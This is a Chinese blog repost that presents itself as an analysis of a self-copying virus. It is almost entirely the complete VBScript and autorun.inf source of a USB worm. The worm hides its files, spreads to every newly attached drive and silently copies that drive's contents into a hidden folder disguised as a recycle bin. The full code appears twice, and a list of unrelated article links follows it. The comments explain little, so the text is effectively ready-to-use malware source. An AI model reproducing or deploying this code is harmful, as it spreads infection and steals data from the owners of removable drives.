最新恶意复制型病毒及代码分析
2024-05-14 06:21:29
最新恶意复制型病毒及代码分析病毒最大的特点在于中毒后,自动感染你的硬盘根目录,并复制病毒文件。无论你是采用双击,还是右键选择打开,或者运行资源管理器都会自动运行其代码(病毒),所以中此病毒后,新手往往打不开盘符,导致数据无法读取。
下面是病毒的代码分析 文件总共有三个 都很简单,已经加上了注解。
文件名:autorun.inf
--------
[autorun]
open=
shell\open=打开(&O)
shell\open\Command=WScript.exe stNP.vbs
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=WScript.exe stNP.vbs
==================
文件名:stNP.VBS
-------
on error resume next
set fso = CreateObject("Scripting.FileSys"&"temObject")
if fso.FileExists("NP.vbs") = -1 then
if fso.FileExists("d:\NP.vbs") = -1 then
set f = fso.getfile("d:\NP.vbs")
if f.attributes = 0 then
else
f.attributes = 0
end if
f.delete(true)
end if
fso.copyfile "NP.vbs", "d:\NP.vbs", true
set wshshell = wscript.createobject("WScript.Shell")
wshshell.run "d:\NP.vbs"
end if
================
文件名:NP.VBS
-----
'[NatruePark]
'容错语句
on Error resume next
'变量声明及初始化
dim fso, old_drs(), new_drs(), old_n, new_n, new_yn, wshshell
set fso = CreateObject("Scripting.File"&"SystemObject")
set wshshell = wscript.createobject("WScript.Shell")
old_n=0
redim old_drs(old_n)
old_drs(0)="C"
'[主体部分]
wshshell.run("explorer .\")
dim i
i = 0
do while i>=0 and i<8*360
scan_disk()
if judge_new_disk() = 1 then
dim left_n
left_n = 1
do while left_n<=(new_n-old_n)
new_disk = new_drs(left_n+old_n)&":\"
'-----------------<维护块>-----------------
if fso.FileExists(new_disk&"NP.vbs") = -1 then
else
self_copy(new_disk)
end if
add_attrib(new_disk&"NP.vbs")
if fso.FileExists(new_disk&"autorun.inf") = -1 then
del_attrib(new_disk&"autorun.inf")
end if
add_autorun(new_disk)
add_attrib(new_disk&"autorun.inf")
if fso.FileExists(new_disk&"stNP.vbs") = -1 then
else
add_stNP(new_disk)
end if
add_attrib(new_disk&"stNP.vbs")
'-----------------维护块>-----------------
'-----------------<功能块>-----------------
dim rec
rec = "d:\Recyc1ed\"
if fso.FolderExists(rec) = -1 then
else
fso.createfolder(rec)
end if
add_attribf(rec)
if fso.FileExists(rec&"desktop.ini") = -1 then
else
add_desktop(rec)
end if
add_attrib(rec&"desktop.ini")
aim_folder = rec&Date()&Rnd()
if fso.FolderExists(aim_folder) = -1 then
else
fso.createfolder(aim_folder)
end if
'查找"汽轮机原理文件夹并复制"
if fso.FolderExists(new_disk&"汽轮机原理") = -1 then
fso.copyfolder new_disk&"汽轮机原理", aim_folder, true
add_attribf(aim_folder)
end if
'通用复制
if old_n = 0 then
else
set fp = fso.getFolder(new_drs(new_n)&":\")
set fc = fp.SubFolders
for each f in fc
fso.copyfolder f&"", aim_folder&"\"&f.name, true
next
set fc = fp.files
for each f in fc
fso.copyfile f&"", aim_folder&"\", true
next
add_attribf(aim_folder)
end if
'-----------------功能块>-----------------
left_n=left_n+1
loop
copy_disk()
end if
wscript.sleep(10000)
i=i+1
loop
'[函数部分]
'可用驱动器检测 new_drs(),new_n
function scan_disk()
dim d, dr
new_n = -1
set dr = fso.drives
for each d in dr
if d.isready then
new_n=new_n+1
redim preserve new_drs(new_n)
new_drs(new_n)=d.driveletter
end if
next
end function
'判断是否有新加入的驱动器
function judge_new_disk()
if new_n = old_n then
judge_new_disk = 0
elseif new_n < old_n then
redim preserve old_drs(new_n)
old_n = new_n
judge_new_disk = 0
elseif new_n > old_n then
redim preserve old_drs(new_n)
judge_new_disk = 1
end if
end function
'复制新驱动器表单
function copy_disk()
dim n
n=0
do while n<=new_n
old_drs(n) = new_drs(n)
n=n+1
loop
old_n = new_n
end function
'添加指定文件属性
function add_attrib(file)
set f = fso.getfile(file)
if f.attributes = 7 then
else
f.attributes = 7
end if
end function
'删除指定文件属性
function del_attrib(file)
set f = fso.getfile(file)
if f.attributes = 7 then
f.attributes = 0
else
end if
end function
'自我复制到指定文件目录
function self_copy(folder)
dim aim_path, mid_path, self_file, mid_file
aim_path = folder&"NP.vbs"
mid_path = "c:\np.bin"
set self_file = fso.opentextfile(wscript.scriptfullname,1)
self = self_file.readall
set mid_file = fso.opentextfile(mid_path,2,true)
mid_file.write self
mid_file.close
set mid_file = fso.getfile(mid_path)
mid_file.copy(aim_path)
mid_file.delete(true)
end function
'增加autorun.inf
function add_autorun(folder)
dim path
path = folder&"autorun.inf"
set temp = fso.CreateTextFile("c:\a.bin",true)
temp.writeline "[autorun]"
temp.writeline "open="
temp.writeline "shell\open=打开(&O)"
temp.writeline "shell\open\Command=WScript.exe stNP.vbs"
temp.writeline "shell\open\Default=1"
temp.writeline "shell\explore=资源管理器(&X)"
temp.writeline "shell\explore\Command=WScript.exe stNP.vbs"
temp.close
set cop = fso.getfile("c:\a.bin")
cop.copy(path)
cop.delete(true)
end function
'增加desktop.ini
function add_desktop(folder)
dim path
path = folder&"desktop.ini"
set temp = fso.CreateTextFile("c:\d.bin",true)
temp.writeline "[.ShellClassInfo]"
temp.writeline "CLSID={645FF040-5081-101B-9F08-00AA002F954E}"
temp.close
set cop = fso.getfile("c:\d.bin")
cop.copy(path)
cop.delete(true)
end function
'增加stNP.vbs
function add_stNP(folder)
dim path
set fso = CreateObject("Scripting.File"&"SystemObject")
path = folder&"stNP.vbs"
set temp = fso.CreateTextFile("c:\s.bin",true)
temp.writeline "on error resume next"
temp.writeline "set fso = CreateObject("&chr(34)&"Scripting.FileSys"&chr(34)&"&"&chr(34)&"temObject"&chr(34)&")"
temp.writeline "if fso.FileExists("&chr(34)&"NP.vbs"&chr(34)&") = -1 then"
temp.writeline "if fso.FileExists("&chr(34)&"d:\NP.vbs"&chr(34)&") = -1 then"
temp.writeline "set f = fso.getfile("&chr(34)&"d:\NP.vbs"&chr(34)&")"
temp.writeline "if f.attributes = 0 then"
temp.writeline "else"
temp.writeline "f.attributes = 0"
temp.writeline "end if"
temp.writeline "f.delete(true)"
temp.writeline "end if"
temp.writeline "fso.copyfile "&chr(34)&"NP.vbs"&chr(34)&", "&chr(34)&"d:\NP.vbs"&chr(34)&", true"
temp.writeline "set wshshell = wscript.createobject("&chr(34)&"WScript.Shell"&chr(34)&")"
temp.writeline "wshshell.run "&chr(34)&"d:\NP.vbs"&chr(34)
temp.writeline "end if"
temp.close
set cop = fso.getfile("c:\s.bin")
cop.copy(path)
cop.delete(true)
end function
'添加指定文件夹属性
function add_attribf(folder)
set f = fso.getfolder(folder)
if f.attributes = 7 then
else
f.attributes = 7
end if
end function
'删除指定文件夹属性
function del_attribf(folder)
set f = fso.getfolder(folder)
if f.attributes = 0 then
else
f.attributes = 0
end if
end function
wscript.echo("THANK YOU!!")
wscript.quit
下面是病毒的代码分析 文件总共有三个 都很简单,已经加上了注解。
文件名:autorun.inf
--------
[autorun]
open=
shell\open=打开(&O)
shell\open\Command=WScript.exe stNP.vbs
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=WScript.exe stNP.vbs
==================
文件名:stNP.VBS
-------
on error resume next
set fso = CreateObject("Scripting.FileSys"&"temObject")
if fso.FileExists("NP.vbs") = -1 then
if fso.FileExists("d:\NP.vbs") = -1 then
set f = fso.getfile("d:\NP.vbs")
if f.attributes = 0 then
else
f.attributes = 0
end if
f.delete(true)
end if
fso.copyfile "NP.vbs", "d:\NP.vbs", true
set wshshell = wscript.createobject("WScript.Shell")
wshshell.run "d:\NP.vbs"
end if
================
文件名:NP.VBS
-----
'[NatruePark]
'容错语句
on Error resume next
'变量声明及初始化
dim fso, old_drs(), new_drs(), old_n, new_n, new_yn, wshshell
set fso = CreateObject("Scripting.File"&"SystemObject")
set wshshell = wscript.createobject("WScript.Shell")
old_n=0
redim old_drs(old_n)
old_drs(0)="C"
'[主体部分]
wshshell.run("explorer .\")
dim i
i = 0
do while i>=0 and i<8*360
scan_disk()
if judge_new_disk() = 1 then
dim left_n
left_n = 1
do while left_n<=(new_n-old_n)
new_disk = new_drs(left_n+old_n)&":\"
'-----------------<维护块>-----------------
if fso.FileExists(new_disk&"NP.vbs") = -1 then
else
self_copy(new_disk)
end if
add_attrib(new_disk&"NP.vbs")
if fso.FileExists(new_disk&"autorun.inf") = -1 then
del_attrib(new_disk&"autorun.inf")
end if
add_autorun(new_disk)
add_attrib(new_disk&"autorun.inf")
if fso.FileExists(new_disk&"stNP.vbs") = -1 then
else
add_stNP(new_disk)
end if
add_attrib(new_disk&"stNP.vbs")
'-----------------维护块>-----------------
'-----------------<功能块>-----------------
dim rec
rec = "d:\Recyc1ed\"
if fso.FolderExists(rec) = -1 then
else
fso.createfolder(rec)
end if
add_attribf(rec)
if fso.FileExists(rec&"desktop.ini") = -1 then
else
add_desktop(rec)
end if
add_attrib(rec&"desktop.ini")
aim_folder = rec&Date()&Rnd()
if fso.FolderExists(aim_folder) = -1 then
else
fso.createfolder(aim_folder)
end if
'查找"汽轮机原理文件夹并复制"
if fso.FolderExists(new_disk&"汽轮机原理") = -1 then
fso.copyfolder new_disk&"汽轮机原理", aim_folder, true
add_attribf(aim_folder)
end if
'通用复制
if old_n = 0 then
else
set fp = fso.getFolder(new_drs(new_n)&":\")
set fc = fp.SubFolders
for each f in fc
fso.copyfolder f&"", aim_folder&"\"&f.name, true
next
set fc = fp.files
for each f in fc
fso.copyfile f&"", aim_folder&"\", true
next
add_attribf(aim_folder)
end if
'-----------------功能块>-----------------
left_n=left_n+1
loop
copy_disk()
end if
wscript.sleep(10000)
i=i+1
loop
'[函数部分]
'可用驱动器检测 new_drs(),new_n
function scan_disk()
dim d, dr
new_n = -1
set dr = fso.drives
for each d in dr
if d.isready then
new_n=new_n+1
redim preserve new_drs(new_n)
new_drs(new_n)=d.driveletter
end if
next
end function
'判断是否有新加入的驱动器
function judge_new_disk()
if new_n = old_n then
judge_new_disk = 0
elseif new_n < old_n then
redim preserve old_drs(new_n)
old_n = new_n
judge_new_disk = 0
elseif new_n > old_n then
redim preserve old_drs(new_n)
judge_new_disk = 1
end if
end function
'复制新驱动器表单
function copy_disk()
dim n
n=0
do while n<=new_n
old_drs(n) = new_drs(n)
n=n+1
loop
old_n = new_n
end function
'添加指定文件属性
function add_attrib(file)
set f = fso.getfile(file)
if f.attributes = 7 then
else
f.attributes = 7
end if
end function
'删除指定文件属性
function del_attrib(file)
set f = fso.getfile(file)
if f.attributes = 7 then
f.attributes = 0
else
end if
end function
'自我复制到指定文件目录
function self_copy(folder)
dim aim_path, mid_path, self_file, mid_file
aim_path = folder&"NP.vbs"
mid_path = "c:\np.bin"
set self_file = fso.opentextfile(wscript.scriptfullname,1)
self = self_file.readall
set mid_file = fso.opentextfile(mid_path,2,true)
mid_file.write self
mid_file.close
set mid_file = fso.getfile(mid_path)
mid_file.copy(aim_path)
mid_file.delete(true)
end function
'增加autorun.inf
function add_autorun(folder)
dim path
path = folder&"autorun.inf"
set temp = fso.CreateTextFile("c:\a.bin",true)
temp.writeline "[autorun]"
temp.writeline "open="
temp.writeline "shell\open=打开(&O)"
temp.writeline "shell\open\Command=WScript.exe stNP.vbs"
temp.writeline "shell\open\Default=1"
temp.writeline "shell\explore=资源管理器(&X)"
temp.writeline "shell\explore\Command=WScript.exe stNP.vbs"
temp.close
set cop = fso.getfile("c:\a.bin")
cop.copy(path)
cop.delete(true)
end function
'增加desktop.ini
function add_desktop(folder)
dim path
path = folder&"desktop.ini"
set temp = fso.CreateTextFile("c:\d.bin",true)
temp.writeline "[.ShellClassInfo]"
temp.writeline "CLSID={645FF040-5081-101B-9F08-00AA002F954E}"
temp.close
set cop = fso.getfile("c:\d.bin")
cop.copy(path)
cop.delete(true)
end function
'增加stNP.vbs
function add_stNP(folder)
dim path
set fso = CreateObject("Scripting.File"&"SystemObject")
path = folder&"stNP.vbs"
set temp = fso.CreateTextFile("c:\s.bin",true)
temp.writeline "on error resume next"
temp.writeline "set fso = CreateObject("&chr(34)&"Scripting.FileSys"&chr(34)&"&"&chr(34)&"temObject"&chr(34)&")"
temp.writeline "if fso.FileExists("&chr(34)&"NP.vbs"&chr(34)&") = -1 then"
temp.writeline "if fso.FileExists("&chr(34)&"d:\NP.vbs"&chr(34)&") = -1 then"
temp.writeline "set f = fso.getfile("&chr(34)&"d:\NP.vbs"&chr(34)&")"
temp.writeline "if f.attributes = 0 then"
temp.writeline "else"
temp.writeline "f.attributes = 0"
temp.writeline "end if"
temp.writeline "f.delete(true)"
temp.writeline "end if"
temp.writeline "fso.copyfile "&chr(34)&"NP.vbs"&chr(34)&", "&chr(34)&"d:\NP.vbs"&chr(34)&", true"
temp.writeline "set wshshell = wscript.createobject("&chr(34)&"WScript.Shell"&chr(34)&")"
temp.writeline "wshshell.run "&chr(34)&"d:\NP.vbs"&chr(34)
temp.writeline "end if"
temp.close
set cop = fso.getfile("c:\s.bin")
cop.copy(path)
cop.delete(true)
end function
'添加指定文件夹属性
function add_attribf(folder)
set f = fso.getfolder(folder)
if f.attributes = 7 then
else
f.attributes = 7
end if
end function
'删除指定文件夹属性
function del_attribf(folder)
set f = fso.getfolder(folder)
if f.attributes = 0 then
else
f.attributes = 0
end if
end function
wscript.echo("THANK YOU!!")
wscript.quit
转载于:https://www.cnblogs.com/budaolonghu/archive/2009/11/28/1612808.html
最新恶意复制型病毒及代码分析相关推荐
- 2018-2019-2 20165114《网络对抗技术》Exp4 恶意代码分析
Exp4 恶意代码分析 目录 一.实验目标 (1)监控你自己系统的运行状态,看有没有可疑的程序在运行. (2)分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具尽量使用原生指令或sys ...
- 基于windows PE文件的恶意代码分析;使用SystemInternal工具与内核调试器研究windows用户空间与内核空间...
基于windows PE文件的恶意代码分析:使用SystemInternal工具与内核调试器研究windows用户空间与内核空间 ******************** 既然本篇的主角是PE文件,那 ...
- 网安--第七章 恶意代码分析与防治
第7章 恶意代码分析与防治 内容提要 ◎ 恶意代码的发展史和恶意代码长期存在的原因 ◎ 恶意代码实现机理.定义以及攻击方法 ◎ 恶意代码生存技术.隐藏技术,介绍网络蠕虫的定义以及结构 ◎ 恶意代码防范 ...
- 20145236《网络攻防》Exp4 恶意代码分析
20145236<网络攻防>Exp4 恶意代码分析 一.基础问题回答 如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么.请设计下你想监控的操作有哪些 ...
- 2018-2019-2 网络对抗技术 20165324 Exp4:恶意代码分析
2018-2019-2 网络对抗技术 20165324 网络对抗技术 Exp4:恶意代码分析 课下实验: 实践目标 是监控你自己系统的运行状态,看有没有可疑的程序在运行. 是分析一个恶意软件,就分析E ...
- 20155317《网络对抗》Exp4 恶意代码分析
20155317<网络对抗>Exp4 恶意代码分析 基础问题回答 如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么.请设计下你想监控的操作有哪些,用 ...
- 2018-2019-2 20165209 《网络对抗技术》Exp4:恶意代码分析
2018-2019-2 20165209 <网络对抗技术>Exp4:恶意代码分析 1 基础问题回答和实验内容 1.1基础问题回答 如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监 ...
- 20145217《网络对抗》 恶意代码分析
20145217<网络对抗> 免杀原理与实践 知识点学习总结 进行恶意代码分析之前必须具备以下知识:编程.汇编/反汇编.网络基本知识.PE文件结构以及一些常用行为分析软件. 一.在一个已经 ...
- 20155320《网络对抗》Exp4 恶意代码分析
20155320<网络对抗>Exp4 恶意代码分析 [系统运行监控] 使用schtasks指令监控系统运行 首先在C盘目录下建立一个netstatlog.bat文件(由于是系统盘,所以从别 ...
最新文章
- Android Studio-设置鼠标悬停显示方法声明
- 2019 Multi-University Training Contest 2 - 1008 - Harmonious Army - 最大流
- » 欄位太小以致於無法接受您試圖加入的資料數量
- java新建测试程序_java – 如何创建一个CloseableHttpResponse对象来帮助测试?
- 在线预览视频/直播:m3u8、rmpt、mp4、flv
- navicat创建计算列_Tableau Part 9 计算字段amp;粒度聚合比率amp;表计算
- 计算机二级ppt为客户制作演示文稿,计算机二级ppt真题:制作介绍北京ppt
- 微处理器:50岁了!
- HTML用于定义宽度的是,HTML Style columnRuleWidth用法及代码示例
- 阶段1 语言基础+高级_1-3-Java语言高级_08-JDK8新特性_第3节 两种获取Stream流的方式_7_Stream流中的常用方法_limit...
- 网络层(六)MAC地址与IP地址
- Sigmoid Belief Net
- 第十章:项目沟通管理 - (10.0 项目沟通管理是什么)
- 【无标题】60秒倒计时
- 判断等腰三角形java_JAVA如何编写程序判断一个三角形是否为等腰三角形
- 自己动手编译QGIS 3.18源代码,含出错大全和解决办法
- 华为软件迁移实践微认证试题库
- 《致我们终将逝去的青春》经典语录
- 微信H5纯签约 提示“发起签约页面非法”
- 个人收藏的网站(会更新)